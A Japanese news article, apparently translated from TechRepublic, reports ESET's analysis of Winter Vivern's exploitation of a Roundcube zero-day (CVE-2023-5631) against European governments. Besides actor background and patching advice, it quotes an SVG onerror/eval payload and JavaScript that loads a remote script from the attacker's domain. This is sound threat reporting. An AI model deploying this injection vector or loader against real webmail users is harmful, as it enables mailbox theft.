ESETの研究員マシュー・ファウ氏は、ロシアとベラルーシの利益に合致するサイバースパイ活動を行う脅威アクター「Winter Vivern」による新たなサイバー攻撃を暴露しました。この攻撃は、Roundcubeウェブメールのゼロデイ脆弱性を悪用することに重点を置いており、Roundcubeアカウント内のフォルダとメールを一覧表示し、攻撃者が管理するサーバーにメール全文を流出させることが可能でした。サイバーセキュリティ企業ESETによると、この攻撃キャンペーンはヨーロッパの政府機関とシンクタンクを標的としていました。このサイバー攻撃は現在は停止しています。
ジャンプ先:
- Roundcubeのゼロデイ脆弱性を悪用したこのサイバー攻撃に関する技術的詳細
- ウィンター・ヴィバーンって誰?
- このサイバーセキュリティの脅威からユーザーを守る方法
Roundcubeのゼロデイ脆弱性を悪用したこのサイバー攻撃に関する技術的詳細
脅威の攻撃者は、「Get started in your Outlook」という件名で「team.management@outlook(.)com」から特別に細工した電子メールメッセージを送信することで攻撃を開始します (図 A )。
図A
メール末尾のSVGタグには、base64エンコードされた悪意のあるペイロードが含まれています。これはユーザーには表示されませんが、HTMLソースコードには存在します。デコードすると、悪意のあるコンテンツは以下のようになります。
<svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>
悪意のあるコードの目的は、x パラメータで無効な URL を使用して onerror 属性をトリガーすることです。
onerror 属性のペイロードをデコードすると、ユーザーの Roundcube セッションのコンテキストで被害者のブラウザで実行される JavaScript コード行が生成されます。
var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);
Faou氏が発見した時点では、JavaScriptインジェクションは完全にパッチが適用されたRoundcubeインスタンス上で動作していました。研究者は、このゼロデイ脆弱性がサーバーサイドスクリプトrcube_washtml.phpに存在することを突き止めました。Faou氏の説明によると、このスクリプトは「…Roundcubeユーザーが解釈するHTMLページに追加される前に、悪意のあるSVGドキュメントを適切にサニタイズできなかった」とのことです。
この脆弱性は、Web ブラウザでメッセージを表示する以外、ユーザーとのやり取りを必要としません。そのため、脅威の攻撃者は非常に複雑なソーシャル エンジニアリング手法を使用する必要がなかったと考えられます。表示されるコンテンツはすべてエクスプロイトのトリガーとなります。
この最初の JavaScript コードの実行後、同じく JavaScript で開発され、checkupdate.js という名前の第 2 段階のローダーが実行され、再び JavaScript で記述された最終段階がトリガーされます (図 B )。
図B
最終的なペイロードは、攻撃者が HTTP リクエストを介してコマンド アンド コントロール サーバーに電子メール メッセージを盗み出すだけでなく、現在の Roundcube 電子メール アカウント内のすべてのフォルダーと電子メールを一覧表示する機能も提供します。
TechRepublicがFaou氏にシステムの更なる侵害について質問したところ、同氏は書面で次のように回答しました。「ラテラルムーブメントは確認されていません。JavaScriptコードは、(被害者の)ブラウザのコンテキスト、つまりRoundcubeウィンドウ内でのみ実行されます。そのため、Roundcubeのバックエンドにはアクセスできず、ブラウザから抜け出すにははるかに複雑なエクスプロイトが必要になります。しかし、アクセスを再利用して、侵害を受けた送信者から更なるフィッシングキャンペーンを開始することは可能です(これは確認されていません)。」
ウィンター・ヴィバーンって誰?
Winter Vivern(別名TA473)は、ロシア政府とベラルーシ政府と密接に連携するサイバースパイ活動を行う脅威アクターです。Winter Vivernの脅威アクターが初めて公に明らかになったのは2021年で、アゼルバイジャン、キプロス、インド、イタリア、リトアニア、ウクライナ、バチカンなど、複数の国の政府機関を標的としていました。
この脅威アクターはウェブメールソフトウェアを悪用した事例があり、Roundcubeの古い脆弱性やZimbraの既知のウェブメール脆弱性を悪用して、米国の公選職者や職員、そして欧州の政治経済の専門家を標的にしていました。また、欧州のNATO加盟国政府機関のメールボックスも標的にしていました。
脅威アクターは、標的への侵入に悪意のあるドキュメントやPowerShellバックドアを利用することがよくあります。Winter Vivernは、標的のネットワークをスキャンするために、Acunetixなどの脆弱性スキャナーを使用していると考えられます。
ESETは、Winter VivernがCVE-2020-35730を悪用しているのが確認されていると指摘した。これは、脅威アクターAPT28(以前はGRUとして知られていたロシアの軍事情報局の軍事ユニット26165とされている)も標的としている組織に対する既知のRoundcubeの脆弱性である。
さらにESETは、ベラルーシの外交官を標的とした攻撃を行っている脅威アクター「MoustachedBouncer」との関連性を指摘しました。この件について尋ねられたファウ氏は、TechRepublicに対し、「両グループのネットワークインフラには非常に顕著な類似点があり、共通の組織が両グループにそのインフラを提供している可能性を示唆している」と述べました。
ESETは、現在の脅威について次のように述べています。「このグループのツールセットは洗練されていないものの、その持続性、フィッシング攻撃の非常に定期的な実行、そして脆弱性があることがわかっているにもかかわらず、インターネットに接続された多数のアプリケーションが定期的に更新されていないことから、欧州各国政府にとって脅威となっています。」
このサイバーセキュリティの脅威からユーザーを守る方法
ESETは2023年10月12日にRoundcubeのCVE-2023-5631脆弱性を報告しました。Roundcubeは2023年10月14日にパッチを当て、2023年10月16日にはバージョン1.6.4、1.4.15、1.5.5向けにこの脆弱性を修正するセキュリティアップデートをリリースしました。この脆弱性に対処するため、Roundcubeにパッチを適用することを強くお勧めします。
一般的な脆弱性によって発生する可能性のあるさらなる侵害を回避するために、すべてのオペレーティング システムとソフトウェアを最新の状態に保ち、パッチを適用しておくことをお勧めします。
ブラウザで JavaScript の実行を無効にすると、この脅威は軽減されますが、多くの Web サイトが機能するために JavaScript に大きく依存しているため、ユーザー エクスペリエンスは大幅に低下します。
開示:私はトレンドマイクロに勤務していますが、この記事で述べられている意見は私自身のものです。
